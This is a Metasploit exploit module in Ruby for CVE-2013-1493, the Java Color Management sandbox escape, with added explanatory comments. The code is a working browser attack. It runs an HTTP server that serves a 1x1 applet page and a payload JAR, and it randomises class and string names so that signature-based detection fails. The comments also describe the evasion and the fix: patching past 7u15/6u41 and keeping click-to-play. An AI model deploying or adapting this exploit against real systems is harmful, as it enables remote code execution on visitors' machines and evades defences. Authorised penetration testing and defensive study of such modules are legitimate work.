##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
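# Typographic quotes from the copy/paste made these lines unparseable; plain
# single-quoted strings restored.
require 'msf/core'
require 'rex'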
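# CVE-2013-1493 (Java CMM): an HTTP server that hands out an HTML page with a
# 1x1 applet tag and a JAR built from the module payload plus four precompiled
# classes shipped under data/exploits/cve-2013-1493. As the description states,
# click-to-play is not bypassed, so the victim still has to accept the Java
# warning. Entry-class, archive and JAR entry names are randomised per run
# (see #setup, #generate_html and #build_applet_jar), so detection that keys on
# the literal strings "Init", "metasploit" or "Payload" will not match this
# traffic; the effective mitigation is patching past 7u15 / 6u41 and keeping
# click-to-play enforced.
#
# Restored from a mangled paste: typographic quotes replaced by plain ones,
# the 'DefaultTarget' entry moved back into the module info (it had been
# dropped into #on_request_uri), a duplicated trailing `end` removed, and the
# repeated class-file loading factored into a helper.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the four precompiled applet classes from the framework data directory
  # and gives the applet entry class a random name before the HTTP server is
  # started. Only the Init class is renamed here; Leak, MyBufferedImage and
  # MyColorSpace keep their names inside the JAR (see #build_applet_jar).
  def setup
    @init_class           = load_class_file('Init.class')
    @leak_class           = load_class_file('Leak.class')
    @buffered_image_class = load_class_file('MyBufferedImage.class')
    @color_space_class    = load_class_file('MyColorSpace.class')

    # Same length as "Init" so the in-place substitution leaves the class
    # file's size unchanged (presumably to keep its length-prefixed entries
    # valid — the class files themselves are not visible here).
    @init_class_name = rand_text_alpha('Init'.length)
    @init_class.gsub!('Init', @init_class_name)

    super
  end

  # HTTP request handler, routed on the request URI:
  #   *.jar -> the applet JAR built by #build_applet_jar
  #   .../  -> the landing page, after regenerating the payload for this client
  #   other -> redirect to the resource root
  #
  # @param cli [Rex::Socket] client connection
  # @param request [Rex::Proto::Http::Request] parsed request
  # @return [void]
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      send_response(cli, build_applet_jar, { 'Content-Type' => 'application/octet-stream' })
    when /\/$/
      # Named differently from the `payload` accessor used in
      # #build_applet_jar so the local never shadows the method.
      client_payload = regenerate_payload(cli)
      unless client_payload
        print_error('Failed to generate the payload.')
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource + '/', '')
    end
  end

  # Landing page: a 1x1 applet tag pointing at a randomly named JAR and the
  # entry class renamed in #setup. The archive name is fresh on every call;
  # the class name is fixed for the lifetime of the module instance.
  #
  # @return [String] HTML document
  def generate_html
    [
      %Q|<html><head><title>Loading, Please Wait...</title></head>|,
      %Q|<body><center><p>Loading, Please Wait...</p></center>|,
      %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|,
      %Q|</applet></body></html>|
    ].join
  end

  private

  # Reads one precompiled applet class shipped with the framework.
  #
  # @param name [String] file name under data/exploits/cve-2013-1493
  # @return [String] raw class-file bytes
  # @raise [Errno::ENOENT] when the data file is missing from the install
  def load_class_file(name)
    path = File.join(Msf::Config.install_root, 'data', 'exploits', 'cve-2013-1493', name)
    File.binread(path)
  end

  # Builds the JAR served for *.jar requests: the encoded payload JAR with the
  # four applet classes added, then every entry name and body rewritten so the
  # literal markers "metasploit" and "Payload" are replaced by random strings
  # of the same length.
  #
  # @return [Rex::Zip::Jar]
  def build_applet_jar
    jar = payload.encoded_jar
    jar.add_file("#{@init_class_name}.class", @init_class)
    jar.add_file('Leak.class', @leak_class)
    jar.add_file('MyBufferedImage.class', @buffered_image_class)
    jar.add_file('MyColorSpace.class', @color_space_class)

    metasploit_str = rand_text_alpha('metasploit'.length)
    payload_str    = rand_text_alpha('payload'.length)
    jar.entries.each do |entry|
      entry.name.gsub!('metasploit', metasploit_str)
      entry.name.gsub!('Payload', payload_str)
      entry.data = entry.data.gsub('metasploit', metasploit_str)
      entry.data = entry.data.gsub('Payload', payload_str)
    end

    jar.build_manifest
    jar
  end
end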